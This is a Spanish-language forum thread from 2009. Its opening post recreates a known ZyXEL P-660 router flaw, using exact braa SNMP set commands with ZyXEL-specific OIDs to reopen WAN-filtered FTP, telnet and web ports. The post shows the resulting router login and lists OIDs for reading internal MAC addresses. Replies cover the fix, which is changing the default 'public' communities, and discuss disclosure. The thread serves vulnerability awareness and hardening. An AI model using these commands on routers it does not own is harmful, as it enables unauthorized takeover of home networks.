Seguridad Wireless - Wifi
Equipos y materiales => Puntos de acceso, routers, switchs y bridges => Mensaje iniciado por: 5.1 en 04-12-2009, 19:24 (Viernes)
-
Había oido hablar e incluso puesto en practica alguna vulnerabilidad en routers Zyxel, pero a estas alturas creí que el tema estaba solucionado.
Nada más lejos de la realidad, más bien al contrario, y si no lo crees, sigue leyendo.
Leyendo un paper de d00han.t3am , no he tenido otro remedio que recrear el escenario del ataque.
Que quede bien claro que lo que voy a explicar aquí, ha sido realizado con 2 lineas ADSL de mi propiedad.
RECREAR ESTE DOCUMENTO CON CONEXIONES AJENAS, ES ILEGAL Y NI YO NI ESTA WEB SE HACEN CARGO DE LAS CONSECUENCIAS.
A pesar de que lo advierto, como se que algunos harán mal uso de la información que expongo, por ética, omitiré algunas partes del paper que podrían generar ataques masivos a estos routers.
Empezamos.. lo primero los routers vulnerables a este ataque, P-660HW-D1 , P-660R-D1 , P-660HW-61.
En mi caso, el escenario lo recreé con un P-660HW-D1 con la configuracíon original de telefónica, y su firm por supuesto,
Despues de poner el router a manejar mi conexion, pobre, llevaba mucho en el armario, miro la ip pública que tengo, a partir de ahora 79.75.X.X.
Cito textualmente del paper :
Por defecto, algunos routers de la serie 600 traen el servicio SNMP activado con su respectivo puerto UDP 161 abierto accesible desde la interface LAN y WAN.
Esto en si no es un problema siempre y cuando se proteja por contraseña y no se pueda modificar nada. Pues normalmente no es asi, es decir, la contraseñaa de lectura o GET es "public" y la de escritura o SET es "public" y no existe ningun tipo de filtrado a este puerto/protocolo.
Normalmente, el protocolo SNMP y los datos a los que se acceden se utilizan para monitorizar el estado del dispositivo. La brecha de seguridad se abre aqui, pero realmente el problema viene cuando podemos MODIFICAR la configuracion del dispositivo a nuestro antojo.
Dicho de manera muy simple, el protocolo SNMP utiliza MIBs para intereaccionar con el dispositivo. Por ejemplo, si hacemos una peticion SNMP a un router usando la OID .1.3.6.1.2.1.1.1.0 nos respondera con un string indicando el Modelo.
Una MIB digamos que es una base de datos de OIDs para interaccionar con un dispositivo via protocolo SNMP. Las MIBs que utilizamos aqui no son las "estandar" . Son especificas de los routers ZyXEL y es mas, muchas de ellas tampoco aparecen en la documentacion oficial, se han obtenido, digamos que, por fuerza bruta. Las OIDs estan estructuradas jerarquicamente y "andando" por ellas y bajando de nivel podemos encontrar sorpresas; sorpresas que nos pueden ayudar a cambiar la configuracion sin permisos de administrador.
ZyXEL por ejemplo, tiene MIBs propias, se encabezan bajo la jeraquia:
:.1.3.6.1.4.1.890.1.x.y.z
Vamos al lio...
El soft que necesitamos (bajo linux)
- nmap
- braa
Encontrar, instalar, o explicar el funcionamiento de este soft, no es parte de este post.
Lanzamos braa para confirmar el modelo del router ...
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.2.1.1.1.0
79.155.X.X:112ms:.1.3.6.1.2.1.1.1.0:P-660HW-D1
1 queries made, 1 queries acknowledged.
Scaneamos con nmap los puertos WEB,FTP y TELNET
# nmap -p 80,21,23 79.155.X.X
tarting Nmap 5.00 ( http://nmap.org ) at 2009-12-04 17:51 CET
Interesting ports on XXX.Red-79-155-XX.dynamicIP.rima-tde.net (79.155.XX.XXX):
21/tcp filtered ftp
23/tcp filtered telnet
80/tcp filtered http
Confirmamos el filtrado de los puertos
El 80
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4
79.155.XX.XXX:82ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:80
1 queries made, 1 queries acknowledged.
El 21
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5
79.155.XX.XXX:82ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:21
1 queries made, 1 queries acknowledged.
El 23
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6
79.155.XX.XXX:82ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:23
1 queries made, 1 queries acknowledged.
Bien, es hora de cambiar los valores
WEB
#braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i81
79.155.X.X:123ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:OK, set.
1 queries made, 1 queries acknowledged.
FTP
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i22
79.155.X.X:2037ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set.
1 queries made, 1 queries acknowledged.
TELNET
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i24
79.155.X.X:2037ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set.
1 queries made, 1 queries acknowledged.
Volvemos a pasar el nmap
# nmap -p 80,21,23 79.155.X.X
Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-04 17:57 CET
Interesting ports on XXX.Red-79-155-XX.dynamicIP.rima-tde.net (79.155.XX.XXX):
21/tcp open ftp
23/tcp open telnet
80/tcp open http
Y si... estan accesibles ahora .....
r2d2@K-PAX:~/Scripts$ ftp 79.155.X.X
Connected to 79.155.X.X
220 FTP version 1.0 ready at Sun Jan 23 20:43:39 2000
Name (79.155.X.X:r2d2): 1234
331 Enter PASS command
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
r2d2@K-PAX:~/Scripts$ telnet 79.155.X.X
Trying 79.155.X.X...
Connected to 79.155.X.X
Escape character is '^]'.
Password:****
Copyright (c) 1994 - 2006 ZyXEL Communications Corp.
P-660HW-D1 Main Menu
Getting Started Advanced Management
1. General Setup 21. Filter Set Configuration
2. WAN Backup Setup 22. SNMP Configuration
3. LAN Setup 23. System Security
4. Internet Access Setup 24. System Maintenance
25. IP Routing Policy Setup
Advanced Applications 26. Schedule Setup
11. Remote Node Setup
12. Static Routing Setup
14. Dial-in User Setup 99. Exit
15. NAT Setup
Enter Menu Selection Number:
Please enter a number
A partir de aquí, vamos, no hace falta explicar las posibilidades que se abren ...
Dejemos las cosas como estaban a nuestro router :
WEB
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4=i80
79.155.X.X:123ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.4:OK, set.
1 queries made, 1 queries acknowledged.
FTP
# braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5=i21
79.155.X.X:2037ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set.
1 queries made, 1 queries acknowledged.
TELNET
braa -v -p 200 public@79.155.X.X:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.6=i23
79.155.X.X:2037ms:.1.3.6.1.4.1.890.1.2.1.5.2.1.8.10.5:OK, set.
1 queries made, 1 queries acknowledged.
Nos aseguramos ...
nmap -p 80,21,23 79.155.X.X
tarting Nmap 5.00 ( http://nmap.org ) at 2009-12-04 18:09 CET
Interesting ports on XXX.Red-79-155-XX.dynamicIP.rima-tde.net (79.155.XX.XXX):
21/tcp filtered ftp
23/tcp filtered telnet
80/tcp filtered http
Cabe decir, que a dia de hoy, scanenando un rango de ips de la forma adecuada con braa, es impresionante la cantidad de routers que aparecen.
Así que si tienes uno de estos, ponte las pilas...
Lista de OIDS interesantes :
* Que quereis saber que MAC tiene la IP interna 192.168.1.33 pues nada....
# ./braa -v -x -p 200 public@79.155.X.X:.1.3.6.1.2.1.4.22.1.2.1.192.168.1.33
79.155.X.X:107ms:.1.3.6.1.2.1.4.22.1.2.1.192.168.1.33:00148525ee19 (ES MI MAC)
* Listar los interfaces de red:
OID: .1.3.6.1.2.1.2.2.1.2.1
Value: enet0
OID: .1.3.6.1.2.1.2.2.1.2.2
Value: enet1
OID: .1.3.6.1.2.1.2.2.1.2.3
Value: pppoe
Para terminar, la forma de corregir esto en nuestro router es cambiar la password GET y SET en el menú SNMP.
Espero que os haya gustado, y dejo bien claro que yo solo explico mi experiencia de realizar lo explicado en el paper, no soy su autor.
PD : Se que no es un tema wireless, pero crei que era conveniente difundir este error de configuracion del Zyxel, si creeis que me he pasado publicando esto aqui, podeis borrarlo...
Saludos
-
Aun que no sea un Tema Wireless o algo centrado absolutamente en el mismo este tipo de cosas esta bien saberlas, por lo menos para poder prevenirlas.
Muy bueno lo de no poner el paper al 100% asi por lo menos se intenta evitar intrusiones ilegales.
Gracias por el post ;)
-
Aun que no sea un Tema Wireless o algo centrado absolutamente en el mismo este tipo de cosas esta bien saberlas, por lo menos para poder prevenirlas.
Muy bueno lo de no poner el paper al 100% asi por lo menos se intenta evitar intrusiones ilegales.
Gracias por el post ;)
Ok, porque no tenía muy claro si postearlo o no...
En fin, gracias a vosotros...
-
yo tengo uno de esos, muy bueno el tema ;)
y solo por tocarle un poco los testiculos a uNbAS ;D
¿que mas da si tiene que ver con WIFI o no? en esta sección también se puede hablar de routers no WIFI, o al menos eso da a entender el titulo de la zona.
Equipos y materiales
- Puntos de acceso, routers, switchs y bridges
Sección exclusiva de Puntos de acceso, routers, switchs y bridges
un drsaludo ;)
-
Decir que lo he comprobado, y efectivamente, funciona.
Tambien he de decir, que ando esperando la carta de advertencia por parte de telefonica, por el hecho de escanear un rango de ip en busca de "vulnerabilidades".
Esto ultimo, lo confirmo, por parte de un amigo, que ya le ha llegado cartas de "advertencia" por escanear ips ajenas tuyas.
He de decir, que la ip que yo escaneé, y por lo tanto, hize pruebas, es de un familiar, por lo que..... ando tranquilo.
Lo dicho, a cambiar la config por defecto de los zyxels!!
Saludos.
-
Esto ultimo, lo confirmo, por parte de un amigo, que ya le ha llegado cartas de "advertencia" por escanear ips ajenas tuyas.
me puedes explicar esto mejor ??? ??? ???
¿una carta por escanear IP's ajenas? ??? ??? ???
¿escanear IP's es ilegal? ??? ??? ???
un saludo
-
Decir que lo he comprobado, y efectivamente, funciona.
Tambien he de decir, que ando esperando la carta de advertencia por parte de telefonica, por el hecho de escanear un rango de ip en busca de "vulnerabilidades".
Esto ultimo, lo confirmo, por parte de un amigo, que ya le ha llegado cartas de "advertencia" por escanear ips ajenas tuyas.
He de decir, que la ip que yo escaneé, y por lo tanto, hize pruebas, es de un familiar, por lo que..... ando tranquilo.
Lo dicho, a cambiar la config por defecto de los zyxels!!
Saludos.
Si no hay quejas por parte de el dueño de la Ip que scaneas, no hay carta, pero si, hace ya unos años, a mi me mandaron una, pero me decian que revisara mi sistema por si tenia algún virus.
Eso si, ademas de el scaneo, en esa ocasión, entre por recursos compartidos.
Saludos..
-
Tal como advierte el documento, es cierto, q es "ilegal" ( no se hasta que punto.... ) escanear los puertos de ips ajenas.
Lo digo, porque, un colega, en efecto, tiene su cartita, diciendo lo mismo, que revise de si el pc tiene algo chungo etc etc.
Y lo unico q hizo, fue, escanear ciertas ips en busca de vulneraribilidades para entrar en un sistema que no es el suyo ( trataba de reventar x web ).
Tambien, cuando un pc está infectao de spam, logicamente, al mandar tu maquina tantisimo spam, tambien avisan, diciendo q.... revises el pc.
En definitiva, todos sabemos que los ISP, en todo momento deben de saber que hacemos, o que dejamos de hacer xD ( ya entra en juego lo que es intimidad o jaleos de esos xD )
Si finalmente llega la carta, la escaneo, y la vemos todos ;D
Saludos.
-
que tendria yo que modificar en mi router para que no se pudiesen colar como pedro por su casa??
-
¿te has leído el tema o solo el titulo?
Para terminar, la forma de corregir esto en nuestro router es cambiar la password GET y SET en el menú SNMP.
-
si lo he leido pero lo lei por encima. muchas gracias
-
hola es la primera vez q entro al foro espero estar en contacto con ustedes bueno veo q hablan de vulneabilidad del rauter zyxel, les cuento q yo trabajo con un rauter zyxel 660 hw31 de franja azul ojo no es inalambrico se puede obtener linea de acceso por este rauter si es asio como evitarlo pq mi red telefonica me dice q ponga un filtro de seguridad como macaffe pq acceden por internet como estar seguro.
-
Hola a todos!soy un poco novato en esto y tengo un zyxxel,han tardado muy poco en jodermelo,asi q ahi va mi pregunta:por qué tengo una señal perfecta y tengo internet pero no me puedo conectar,he intentado de todo..el filtrado de mac y no se si lo he hecho bien.Mi problema es q mi ordenador envia paquetes pero por ejemplo tengo 5000 enviados y 1 recibido.a que se debe eso??ha sido de la noche a la mañana y me jode pagarles elinternet a mis vecinos.que puedo hacer???gracias
-
Muchas gracias por el tutorial, sabía que lo ví en algún lado y ya no recordaba dónde
Cambiado el public que aparece en el menu snmp mediante telnet por otra contraseña (me imagino que serán los tres public que hay, al menos no se ha roto nada ^-^ ) y capado cualquier acceso remoto a solo web por lan, hale
-
pues abrá que tener cuidadito ^-^ , de todas formas yo ahora estoy con un comtrend CT-535 de los nuevos que dan. Haber si encuentro vulnerabilidades. Un Saludo! >:(
-
¿Seria asi para tapar el agujero?, entrar por telnet en menu 22:
Se haría así? como explica esa persona?:
Get community= nombre inventado diferente de public o private
Set community= nombre inventado diferente de public o private
Trusted host= Pon una IP local. Ej.- 192.168.1.2
Trap:
community= nombre inventado diferente de public o private
destination= Pon una IP local. Ej.- 192.168.1.2
lo que sacado de otro foro que no estoy registrado
http://www.adslzone.net/postp892144.html
-
Exacto, con eso tapas el agujero
-
Hola soy el autor del "paper" original, y por eso quiero puntualizar un par de cosas:
1º) Estoy convencido de que para que TODOS podamos aprender y para obligar a los fabricantes y distribuidores de IT a mejorar la seguirad hay que publicar las vulnerabilidades y obligarles a reaccionar.
Por eso, aquí teneis el "paper" completo:
http://www.set-ezine.org/autores.php?autor=d00han.t3am
2º) Lo verdaderamente "ético" es avisar a esos fabricantes y distribuidores. Eso hice, por dos veces. Y no obtuve respuesta ni se ha visto modificación de la vulnerabilidad.
Por lo expuesto anteriormente desapruebo la frase:
"Muy bueno lo de no poner el paper al 100% asi por lo menos se intenta evitar intrusiones ilegales."
Al final del artículo se explica como solucionarlo y al no publicarlo completo se omite.
Bueno, a lo mejor a sonado a bronca, pero me gusta que aun esté vivo este asunto. ^-^
-
Pues sinceramente gracias, sólo comentar para lo inexpertos como yo que más vale un ejemplo que mil palabras escritas de las cuales tantos "0" y "1" no entendemos, aunque investigando nos entrramos de otras cosas.
-
no tienen recursos para routers mas seguros los de telefonica, pero les sobra para monitorizar todo el trafico de la red? esto es imposible? q uno haga un sondeo y lo sepan con tantos datos circulando? es q ni filtrando por protocolos XDDDDD